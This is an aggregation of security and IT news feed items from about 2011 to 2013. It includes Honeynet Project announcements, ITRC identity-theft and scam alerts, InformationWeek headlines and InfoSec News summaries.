"Cyber security is a critical element for any nation working towards technical advancement," said H.E. Mohamed Nasser Al Ghanim, Director General of TRA. "I am pleased the TRA and aeCERT are participating in this event; hands-on and knowledge-intensive workshops such as this are invaluable as we work towards reinforcing the nation's cyber security."

"Cyber security is not a one-man job, it is dependent on the proactive collaboration of groups spanning government, industry and academia," said Ahmad Alajail, Security Intelligence & Threat Analyst. "This is why initiatives such as Honeynet, which provide a diverse talent base, are greatly complementary to the nation's cyber security and to our work at aeCERT."

The Honeynet Project is composed of 45 regional chapters and is a diverse, talented, and engaged group of hundreds of volunteer security experts who conduct open, cross disciplinary research and development into the evolving threat landscape.

Registration and more information available at: http://dubai2013.honeynet.org or by contacting The Honeynet Project CEO Christian Seifert to request a personal interview at: christian.seifert@honeynet.org. -End-

==> HP Annual Report 2012 released

http://www.honeynet.org/rss.xml Each year, the Honeynet Project summarizes its activities and activities of its members in a short annual report. You will find the annual report for fiscal year 2012 attached. Enjoy!

==> Honeynet Project completes Cyber Fast Track Project: Web Application Honeypots

http://www.honeynet.org/rss.xml We are happy to be able to announce the successful completion of The Honeynet Project's participation in DARPA's Cyber Fast Track program with our Web Application Honeypot project. Imperva's recent Web Application Attack Report shows the picture of large scale automated threats towards web applications. Adversaries are basically scanning millions of web applications for vulnerabilities every day, and a single successful infection increases their army of workers and thereby their capability for doing more damage. Without a specific target, attackers can leverage automated tools and search engines' excellent information aggregation services to find their victims, identify the vulnerability, and launch an attack. The majority of web application attacks target the web application's database. These so-called SQL injection attacks manipulate the underlying database by providing user input that - due to the vulnerability in the web application - is converted into SQL statements. The main goal of this project was the development of a SQL injection vulnerability emulator that goes beyond the collection of SQL vulnerability probings. It deceives the adversary with crafted responses matching his request into sending us the malicious payload, which could include all kinds of malicious code. The project is being released as open-source and installation instructions can be found on the project page. A detailed report was created as part of the project.

==> Know Your Enemy: Social Dynamics of Hacking

http://www.honeynet.org/rss.xml I am very pleased to announce the publication of another paper in our Know Your Enemy white paper series: "KYE - Social Dynamics of Hacking" authored by Thomas J. Holt and Max Kilger from our Spartan Devils Honeynet Project Chapter. In this paper, Tom and Max go to the roots of the Know Your Enemy series and shine light on the social groups that are involved in hacking. Abstract: Though most information security research focuses on current threats, tools, and techniques to defeat attacks, it is vital to recognize and understand the humans behind attacks. Individual attackers have various skills, motives, and social relationships that shape their actions and the resources they target. In this paper we will explore the distribution of skill in the global hacker community, the influence of on and off-line social relationships, motivations across attackers, and the near-future of threats to improve our understanding of the hacker and attacker community.

==> GSoC 2012 Accepted Students Officially Announced

http://www.honeynet.org/rss.xml Since my last post about the Google Summer Of Code 2012 Student Applications deadline closing and sharing some initial student applications statistics, all the GSoC 2012 mentoring organisations have been hard at work reviewing and scoring their student applications.

==> IC3 Scam Alerts (January 7, 2013)

http://www.ic3.gov/rss/news.xml

==> About the ITRC

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml

==> Identity Theft #1 Again

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity theft complaints continue to rank number one in the Federal Trade Commission's list of complaints, with a 32% increase over 2011. Of the 369,132 complaints reported in 2012, 46.4% involved issues with government documents or benefits fraud. This represents a drastic spike of nearly 70% over the same types of cases last year.

==> 2013 National Consumer Protection Week

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml National Consumer Protection Week is March 3-9, 2013. Go to ncpw.gov to find consumer tips and free materials from government and private organizations. Be an informed consumer; avoid scams and fraud!

==> Fed Ex Undelivered Email Scam

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Consumers are receiving emails that appear to be from Fed Ex notifying the recipient of an "undelivered package". The email then asks the recipient to visit a website.

==> FTC Warns of a Scam Email

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The Federal Trade Commission is warning small businesses that an email with a subject line "NOTIFICATION OF CONSUMER COMPLAINT" is not from the FTC.

==> New Retail Breach Tied to Global Fraud

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Sam Imandoust, ITRC's legal analyst, addresses the recent network hack affecting Arizona-based supermarket chain Bashas' Family of Stores. See the article by Tracy Kitten in BankInfoSecurity.

==> FraudAvengers.org Newsletter

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml FraudAvengers.org has released their January newsletter! The theme of the newsletter is Medical ID Theft.

==> Eva Velasquez Interviewed on 2013 Top Trends

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC's own Eva Velasquez was interviewed by "BankInfo Security" about ID Theft: 2013 Top Trends.

==> Breaches 2013

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As of March 5, the ITRC has reported 100 breaches for 2013. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> 2013 What's Your Story?

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Trend Micro Inc. has announced the fourth annual "What's Your Story?" contest, an award-winning, user-generated video contest that gives youth an interactive platform to showcase not just their filmmaking talents, but how they have harnessed the power and connection of the Internet in a positive way through creative storytelling.

==> Top 13 Things Taxpayers Should Know

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IRS/ITRC Solution 34 - Top 13 Things Every Taxpayer Should Know about Identity Theft - was provided to the ITRC by the IRS Office of Identity Protection. This, along with the new IRS/ITRC Fact Sheet 143, gives the consumer or victim a comprehensive look

==> Social Security Announces New Online Services Available

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml "More than 60 million Social Security beneficiaries and Supplemental Security Income (SSI) recipients can now access their benefit verification letter, payment history, and earnings record instantly using their online account...."

==> IC3 Most Popular Passwords of 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml regarding the most popular 2012 passwords on the web. The ranking was based on password information from compromised accounts posted by hackers online.

==> ITRC Welcomes a New President/CEO

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml appointment of Eva Casey Velasquez as its new President/CEO.

==> Pay Day Loan Scams Affecting Emergency Services

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Reports of pay day loan phone scams have been occurring for the last three years or more. The scam involves victims being relentlessly contacted at their residences and places of employment regarding claims they are delinquent on a payday loan. Various coercion techniques have been used by the subjects in an attempt to persuade the victim to send money....

==> Stop Think Connect

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml STOP. THINK. CONNECT. is the first-ever coordinated message to help all digital citizens stay safer and more secure online. The message was created by an unprecedented coalition of private companies, nonprofits and government organizations.

==> CFPB Halts Alleged Mortgage Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The Consumer Financial Protection Bureau has announced actions to halt two alleged mortgage loan modification scams it believes ripped off thousands of struggling homeowners across the country. In total, these operations took in more than $10 million by charging consumers for services that falsely promised to prevent foreclosures or renegotiate troubled mortgages.

==> Web Wise Kids Teaches Online Safety

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml teaching kids and parents how to be safe online.

==> ITRC Participates in AZ ID Theft Coalition Meeting

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml when participating in an Arizona Identity Theft Coalition meeting. We want to thank everyone in the Arizona Attorney General's Office who were involved in putting together such a great event!

==> IKeepSafe.org Educates K-12

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml K-12 about being safe and smart online.

==> Justice Department Raises Awareness of Disaster Fraud Hotline

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Disaster Fraud (NCDF) remind the public there is a potential for disaster fraud in the aftermath of a natural disaster. Suspected fraudulent activity pertaining to relief efforts should be reported to the NCDF hotline at 866-720-5721. The hotline is staffed by a live operator 24/7, for the purpose of reporting suspected scams being perpetrated by criminals in the aftermath of disasters.

==> IRS Says beware of fraudulent look alike Websites

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml IRS spokesman David Tucker said a scam involving look-alike websites is making the rounds, seeking identity theft victims. "The new tax scam uses a website that mimics the IRS e-Services online registration page," he said. "The actual IRS e-Services page offers web-based products to tax preparers, not the general public. The phony web page looks almost identical to the real one." Read more at the Times Herald Online.

==> Stay Safe Online: Protecting Your Data and Electronic Devices During a Natural Disaster

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml an emergency communications plan? Is your data backed up? Do you have a family emergency plan? Ready.gov has several resources to help individuals learn what to do before, during, and after a natural disaster.

==> IC3 Scam Alert: Pay Day Loan Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml loan scams over the last three years and continues to see new variations of the scam. The scam involves victims who are relentlessly contacted, via the telephone...

==> FBI Fraud Alert

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Banks Warned of Cyber Threat by FBI: The Federal Bureau of Investigation, the Financial Services Information Sharing and Analysis Center, and the Internet Crime Complaint Center have jointly issued a Fraud Alert to financial institutions warning them of alarming trends in unauthorized wire transfers overseas in amounts ranging from $400,000 to $900,000. The Fraud Alert explains ...

==> Public Wifi Survey Whitepaper Released

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Identity Theft and Public WiFi Linked in Consumer Minds: The ITRC has just published a whitepaper containing the results of its Public WiFi Usage Survey, which aimed to measure the level of knowledge and usage of public WiFi.

==> Breaches 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As of December 26, the ITRC has reported 447 breaches for 2012. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> FBI Warns of Mobile Malware Risks

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The FBI has alerted consumers about two Trojans that have compromised mobile devices running the Android operating system. But are all mobile devices at risk?

==> ITRC Monthly Case Load

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml December 2012 ITRC Victim and Consumer Contacts: 577. Total 2012 YTD Contacts: 9,183.

==> Dangerous Side of Online Romance Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IC3 is warning the public to be wary of romance scams in which scammers target individuals who search for companionship or romance online. Someone you know may be "dating" someone online who may appear to be decent and honest. However, be forewarned...

==> IRS Unveils ID Theft Program

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IRS has implemented a new pilot program designed to aid law enforcement in obtaining tax return data to help investigate and prosecute specific cases of identity theft. This program is currently limited to coordinated efforts within the state of Florida. How it works: State and local law enforcement officials with evidence of identity theft involving fraudulently filed federal tax returns will have the victims complete a special IRS disclosure form.

==> ITRaC News

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml ITRaC News is the ITRC quarterly e-newsletter. This newsletter covers: What's New, latest scams, news releases, product information, Guest Authors, various articles about identity theft, legislative updates and more. Click here for 2012 Q4

==> Check Fraud Still a Problem

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml So much attention has been paid to emerging banking technology, but it is still important for banks to pay attention to check fraud. BankInfoSecurity.com tells us that check fraud remains one of the top threats in their Faces of Fraud survey 2012.

==> California AG Launches New Privacy Enforcement and Protection Unit

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml California Attorney General Kamala D. Harris has announced the creation of the Privacy Enforcement and Protection Unit. The organization will focus on protecting consumer and individual privacy through civil prosecution of state and federal privacy laws. For more information, read CALPIRG's most recent blog on the matter.

==> My Free ChildScan

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml A child is an easy target for identity thieves because the crime can go undetected for years. Now parents have a safe and secure way to determine if someone is using their child's Social Security number. Click on the image.

==> 10 Ways To Foster Effective Social Employees

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Social business tools can be used effectively, or they can be a huge time sink.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> H-1B Workers Not Best Or Brightest, Study Says

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Skilled foreign worker programs are causing a U.S. brain drain, an Economic Policy Institute report says.

==> CIO Profiles: Keith J. Figlioli Of Premier

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Don't waste this healthcare alliance CIO's time with overhyped marketing promises.

==> U.K. Nonprofit Seeks Tech Ideas To Help Teens

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Tech for Good challenge will invest $758,000 in projects that use "disruptive digital technology" to create new opportunities for at-risk young adults in the U.K.

==> Could A MOOC Ease Your Talent Problems?

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Boston's EdX partnership with MIT should spur CIOs to consider creating their own massive open online courses to fill skills gaps.

==> Code.org Urges Students To Embrace Programming

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN After tech industry hiring practices left students reluctant to go into software engineering, the industry wants to make up.

==> Cisco CEO: We're All In On Internet Of Everything

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN CEO John Chambers touts Internet of Everything as cornerstone of Cisco's strategy, urges business leaders to join push toward open standards and cross-industry collaboration.

==> Federal CIO Q&A: Security, Sequestration And More

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Biggest challenge in realizing agile, efficient government IT continues to be the required cultural change, says Federal CIO Steve VanRoekel.

==> U.K., India Sign Cybersecurity Pact

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Government and law enforcement agencies will collaborate to protect U.K. data held by Indian outsourcers and cloud vendors.

==> IT Security Understaffing Worries CISOs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN More than two-thirds of execs say current staffing levels pose risks to company safety, according to new study.

==> LinkedIn Endorsements: Do's And Don'ts

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Love them or hate them, you can't just ignore LinkedIn Endorsements. Here's expert advice on how to deal with social's new head-scratcher.

==> HP CEO Dismisses Break-Up Talk

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN While sharing dismal Q1 results, HP CEO Meg Whitman says HP will not sell its enterprise services or PC unit; projects return to growth in 2014.

==> Healthcare CIOs Juggle Obamacare, Traditional Projects

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Newly empowered healthcare CIOs struggle to find their way in regulatory landscape while defending budgets, says Deloitte report.

==> Big Data Myths Persist

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Big data hype has reached a level where some customers are actually avoiding labeling projects as big data, Tibco executives say.

==> 4 Big BYOD Trends For 2013

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Interop Las Vegas speaker Michael Finneran and other BYOD experts discuss key trends enterprise IT leaders should watch in 2013.

==> LinkedIn Jobs Gets A Search Boost

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN LinkedIn's makeover continues, but is the platform moving in the right direction?

==> Accenture: Seven Key Tech Trends For Business

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Accenture survey suggests practical ways to get your organization on a path to digital success.

==> U.K. CIO Salaries Strong Despite Recession, Study Says

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN British IT leaders are more than holding their own when it comes to professional compensation.

==> Google, Amazon May Face New Hurdle In U.K.

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Will Google, Amazon and other U.S. IT companies be shut out of U.K. government contracts after bragging about tax avoidance?

==> CIO Profiles: Ken Harris of Shaklee

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Hands-on attention from higher-ups key to IT project success, says CIO for natural nutrition company Shaklee.

==> 7 Moves Dell Must Make Now

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Dell's decision to go private was a bold step, but the company must continue making aggressive decisions to succeed.

==> Even Grandmothers Can Be Online Trolls

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN U.K. company Saga shutters its social media site for seniors after online trolls produce a stream of abuse and mayhem.

==> U.K. IT Employment Paradox Raises Questions

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN U.K. is adding jobs at a fast clip, despite its overall economic sluggishness. Why, then, are IT hiring numbers so unimpressive?

==> U.K. Students Not Lining Up To Study IT

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN New figures show sharp decline in the number of British teenagers taking up IT as a subject. The government says it has a solution, but will it come too late?

==> White House Seeks Tech Innovation Fellows

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Program recruits innovators and entrepreneurs to work on "high impact" federal IT projects during six- to 12-month tours of duty.

==> White House Cybersecurity Czar: Executive Order A 'Down Payment'

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Michael Daniel says President Obama's Executive Order on Cybersecurity sets the stage for cybersecurity legislation for protecting critical infrastructure.

==> Ponemon Rates State Of Cloud Security

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Ponemon research shows incremental improvements in risk assessments and data protection in the cloud, but continuing trouble with access control.

==> Bank Attackers Restart Operation Ababil DDoS Disruptions

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Some customers report difficulty accessing banking sites, but officials said DDoS defenses and service provider blocks may be partly to blame.

==> Government Google Data Requests: Scope Unclear

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google has begun disclosing limited information about U.S. government investigations that demand consumer data and, usually, silence from those cooperating.

==> Java Emergency Patch Slaps McRAT Infections

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Oracle patches two more zero-day bugs in Java 6 and Java 7. But a security researcher spots new vulnerabilities in Java 7.

==> Evernote: We're Adding Two-Factor Authentication

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN After data breach and wide password reset, Evernote accelerates plans to offer additional security to users.

==> What Unlocked Phones Mean For Businesses

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN U.S. lawmakers pledge to change regulations that make it illegal to unlock cell phones. Is there an upside for the enterprise?

==> Kim Dotcom Plans Mega IPO

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN MegaUpload founder, still sought for extradition by the U.S. government, hires CFO to help float his new cloud storage service.

==> Evernote Breach: 7 Security Lessons

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Both cloud service providers and users should heed the security takeaways from Evernote's breach and response.

==> Evernote Breach: What It Means To Enterprise IT

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Cloud naysayers will insist that this incident shows why we should never use the cloud. Give me a break.

==> Kill Passwords: Hassle-Free Substitute Wanted

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Passwords keep proliferating, but do new technologies and approaches offer an alternative? Maybe.

==> Google+ Social Sign-In Has Pros, Cons

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google+ Sign-In offers tighter mobile integration and additional controls. But will it allay user fears?

==> Anonymous Launches Operation Wall Street, Targets CEOs

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Hacktivist collective cites mortgage crisis, Aaron Swartz and bank spying in call to arms to dox "any and all personal information" on financial services firm executives.

==> 5 Lessons From FBI Insider Threat Program

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Use these tips to recognize threats and deter insider theft attempts before they happen.

==> FBI Director Stresses Cybercrime Deterrence, Identification

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Robert Mueller cites arrest of LulzSec's 'Sabu' as a prime example of how the FBI is tracking down cybercriminals, in RSA keynote.

==> Zero Day Java Vulnerability Allows McRat Trojan Infections

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Security experts urge users of latest versions of Java 6 and 7 to disable Java in their browsers until Oracle releases a patch.

==> Security Tools Show Many Dots, Few Patterns

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Today's security software wastes valuable time by delivering data dumps, rather than focusing on trends. But you can create your own visualizations.

==> China Targets U.S. In Hacking Blame Game

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Responding to allegations that China regularly hacks U.S. businesses, Chinese government officials claim that 63% of cyber attacks on their military systems in 2012 came from the U.S.

==> MiniDuke Espionage Malware Uses Twitter To Infect PCs

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Online espionage campaign sends malicious PDF documents to victims, and the infected PCs use Twitter to install malware that can copy and delete files.

==> Anonymous: 10 Things We've Learned In 2013

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The Anonymous hacker group continues to seek equal measures of revenge, justice and reform, preferably through chaotic means, for perceived wrongdoings.

==> Flash Patch, Take Three: Adobe Issues New Fix

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN With attackers actively targeting zero-day flaws in Flash Reader, Adobe has released its third emergency Flash update this month.

==> Stuxnet Older Than Believed

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Symantec finds earlier version of infamous malware.

==> SMS Spam Delivers More Malware, Scams

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Threats are now often disguised as gift offers, product giveaways, and payment protection insurance.

==> Who Owns Student Data?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN As data collection and data analysis in education grow, so do worries about student and teacher privacy. Is there enough protection?

==> Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back !

http://www.infosecnews.org/isn.rss InfoSec News: Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back !: Forwarded from: noreply (at) crypto.cs.stonybrook.edu 2011 ACM Cloud Computing Security Workshop (CCSW) at CCS October 21, 2011, SWISSOTEL Chicago http://crypto.cs.stonybrook.edu/ccsw11 Dear Colleagues, CCSW is back! The past workshops were a tremendous success, with over [...]

==> Unfollowed: How a (Possible) Social Network Spy Came Undone

http://www.infosecnews.org/isn.rss InfoSec News: Unfollowed: How a (Possible) Social Network Spy Came Undone: http://www.wired.com/dangerroom/2011/04/unfollowed-how-a-possible-social-network-spy-came-undone/ [When the early information about this story was coming out, it was that @PrimorisEra might have been spotting and assessing targets for a KGB honey pot operation. [...]

==> US-Russian dictionary defines cyber war, other concepts

http://www.infosecnews.org/isn.rss InfoSec News: US-Russian dictionary defines cyber war, other concepts: http://gcn.com/articles/2011/04/28/us-russia-cyber-dictionary.aspx By William Jackson GCN.com April 28, 2011 It is all very well to talk about cyberspace and cybersecurity, but what do they mean, exactly? A U.S.-Russian effort is proposing common definitions. [...]

==> ICANN taps DefCon founder for top security spot

http://www.infosecnews.org/isn.rss InfoSec News: ICANN taps DefCon founder for top security spot: http://www.v3.co.uk/v3-uk/news/2046681/icann-taps-defcon-founder-security-spot By Shaun Nichols V3.co.uk 29 Apr 2011 The Internet Corporation for Assigned Names and Numbers (ICANN) has named Jeff Moss as its new chief security officer. A security expert and respected member of the hacking community, Moss is best known for his roles in founding the DefCon and Black Hat security conferences. He has also worked in advisory positions for the US Department of Homeland Security. The appointment of Moss will bring to ICANN a security head who is well-versed in the attitudes and techniques which have driven research in both security intrusions and detections in recent years. The hiring also comes at a time when ICANN and other internet governance groups are working to roll out security measures such as DNSSEC. [...]

==> Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools

http://www.infosecnews.org/isn.rss InfoSec News: Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools: http://www.kirotv.com/education/27708043/detail.html By kirotv.com Webstaff April 28, 2011 SEATTLE -- Someone has stolen teacher passwords and changed grades in a Seattle Public Schools computer system, the district said in an email to teachers obtained Thursday by KIRO 7 Eyewitness News. [...]

==> Cyberespionage: US finds FBI agents in elite unit lack necessary skills

http://www.infosecnews.org/isn.rss InfoSec News: Cyberespionage: US finds FBI agents in elite unit lack necessary skills: Forwarded from: Justin Lundy <jbl (at) tegataiphoenix.com> http://www.csmonitor.com/USA/2011/0427/Cyberespionage-US-finds-FBI-agents-in-elite-unit-lack-necessary-skills By Mark Clayton Staff writer The Christian Science Monitor April 27, 2011 Many of the Federal Bureau of Investigation's field agents assigned to an elite cyber investigative unit lack the skills needed to investigate cases of cyberespionage and other computerized attacks on the US, the Justice Department inspector general reported Wednesday. That's a problem because the US is under constant and increasing cyberattack with 5,499 known intrusions into US government computer systems in 2008 alone -- a 40 percent jump from 2007, the inspector general's office found. Investigating these kinds of cyberespionage attacks falls largely on the FBI as the lead agency for the National Cyber Investigative Joint Task force, which also includes representatives from 18 different intelligence agencies and is assigned to investigate the most difficult national security intrusions -- those by a foreign power for intelligence gathering or terrorist purposes. But in interviews with 36 field agents in 10 of the FBI's 56 field offices nationwide, 13 agents, or more than a third, "reported that they lacked the networking and counterintelligence expertise to investigate national security [computer] intrusion cases." Five of the agents told investigators "they did not think they were able or qualified" to investigate such cases, the report said. The inspector general report does not indicate whether the 36 field agents who were interviewed are a representative sampling of the FBI’s cyber unit. [...]

==> Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College

http://www.infosecnews.org/isn.rss InfoSec News: Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College: http://www.herald-mail.com/news/local/hm-cyber-experts-dissect-hacker-attacks-during-cybersecurity-forum-at-hagerstown-community-college-20110427,0,2996601.story By ANDREW SCHOTZ herald-mail.com April 27, 2011 Experts Wednesday detailed simple and complex ways to protect computers [...]

==> Are we talking "cyber war" like the Bush admin talked WMDs?

http://www.infosecnews.org/isn.rss InfoSec News: Are we talking "cyber war" like the Bush admin talked WMDs?: http://arstechnica.com/security/news/2011/04/are-we-talking-cyber-war-like-the-bush-admin-talked-wmds.ars By Matthew Lasar Ars Technica April 27, 2011 Turn any corner in the complex metropolis that is Internet policy and you'll hear about the "cybersecurity" crisis in two nanoseconds. [...]

==> Oracle hedging its vulnerability reports?

http://www.infosecnews.org/isn.rss InfoSec News: Oracle hedging its vulnerability reports?: http://www.computerworld.com/s/article/9216213/Oracle_hedging_its_vulnerability_reports_ By Joab Jackson IDG News Service April 27, 2011 Oracle may be subtly misleading customers about the severity of some of the vulnerabilities found in its database software, according to [...]

==> PlayStation credit card data was encrypted

http://www.infosecnews.org/isn.rss InfoSec News: PlayStation credit card data was encrypted: http://www.zdnet.com.au/playstation-credit-card-data-was-encrypted-339314012.htm By Darren Pauli ZDNet.com.au April 28th, 2011 Sony has confirmed that the credit card details possibly stolen in a breach of its PlayStation Network (PSN) were encrypted. [...]

==> Phone-hacking laws are 'very uneven and unclear'

http://www.infosecnews.org/isn.rss InfoSec News: Phone-hacking laws are 'very uneven and unclear': http://www.guardian.co.uk/media/2011/apr/26/phone-hacking-laws-christopher-graham By James Robinson guardian.co.uk 26 April 2011 The information commissioner has told a powerful group of MPs that legislation outlawing phone hacking is "very uneven" and "very unclear" [...]

==> USENIX WOOT '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: USENIX WOOT '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> I'm writing to remind you that the submission deadline for the 5th USENIX Workshop on Offensive Technologies (WOOT '11) is approaching. Please submit all work by May 2, 2011, at 11:59 p.m. PDT. [...]

==> USENIX HotSec '11 Submission Deadline Extended

http://www.infosecnews.org/isn.rss InfoSec News: USENIX HotSec '11 Submission Deadline Extended: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> I'm writing to remind you that the submission deadline for the 6th USENIX Workshop on Hot Topics in Security has been extended. Please submit all work by 11:59 p.m. EST on May 12, 2011.

HotSec takes a broad view of security and privacy and encompasses research on new security ideas and problems. Cross-discipline papers identifying new security problems or exploring approaches not previously applied to security will be given special consideration. All submissions should propose new directions of research, advocate non-traditional approaches, report on noteworthy experience in an emerging area, or generate lively discussion around an important topic. Topics of interest include, but are not limited to, the following:

* Large-scale threats
* Network security
* Hardware security
* Software security
* Physical security
* Programming languages
* Applied cryptography
* Privacy
* Human-computer interaction
* Emerging computing environment
* Sociology
* Economics

Attendance will be limited to 35-50 participants, with preference given to the authors of accepted position papers/presentations. Submission guidelines and more information can be found at http://www.usenix.org/hotsec11/cfpb

